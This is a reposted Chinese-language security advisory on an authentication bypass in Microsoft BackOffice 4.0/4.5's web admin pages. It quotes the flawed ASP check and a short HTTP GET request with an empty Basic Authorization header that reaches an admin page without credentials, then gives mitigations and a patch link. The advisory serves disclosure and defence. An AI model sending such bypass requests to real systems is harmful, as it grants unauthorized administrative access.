OFFICE自学教程网

微软office软件自学教程网

当前位置: 主页 > Office自学教程 > Office资讯 >

Back Office远程Web管理接口可绕过认证访问漏洞

时间:2017-09-14 00:00来源:未知 作者:admin 点击:
受影响系统: Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0 Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 描述: BackOffice是一组集成的运行于Windows NT Server 上的服务器应用组件。 BackOffice中的WEB管理

  受影响系统:

  Microsoft BackOffice 4.0

  - Microsoft Windows NT 4.0

  Microsoft BackOffice 4.5

  - Microsoft Windows NT 4.0

  描述:

  BackOffice是一组集成的运行于Windows NT Server 上的服务器应用组件。

  BackOffice中的WEB管理ASP页面在处理用户验证时存在漏洞,可导致攻击者无需用户名和密码访问管理页面。

  每个BackOffice中的WEB管理ASP页面使用如下代码来进行用户验证:

  If Request.ServerVariables("auth_type") = "" Then

  Response.Status = "401 ACCESS DENIED"

  Response.End

  End If

  上面代码只执行了"authorization/authentication"来进行验证,而使用如下请求可以无需用户名和密码对管理员页面进行访问:

  GET /BOADMIN/BackOffice/SERVICES.ASP HTTP/1.1

  Host: hostname

  Authorization: Basic

  [enter]

  [enter]

  由于上面设置了auth_type变量,所以可以无需认证进行访问。

  一般Back Office Web管理接口默认只限制环回接口(127.0.0.1),所以不能远程进行访问,但也存在管理员设置成可以远程访问的情况。

  <*来源:NGSSoftware Insight Security Research ([email protected])

  链接:http://archives.neohapsis.com/archives/bugtraq/2002-04/0208.html

  *>

  测试方法:

  警 告

  以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

  NGSSoftware Insight Security Research ([email protected])提供了如下测试方法:

  GET /BOADMIN/BackOffice/SERVICES.ASP HTTP/1.1

  Host: hostname

  Authorization: Basic

  [enter]

  [enter]

  建议:

  临时解决方法:

  如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

  * 对Web管理端口设置访问过滤,只允许合法可信的用户访问。

  厂商补丁:

  Microsoft

  ---------

  目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

  http://support.microsoft.com/default.aspx?scid=http%3a%2f%2fwww.microsoft.com%2fdownloads%2frelease.asp%3fReleaseID%3d37717

(责任编辑:admin)
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
用户名: 验证码:点击我更换图片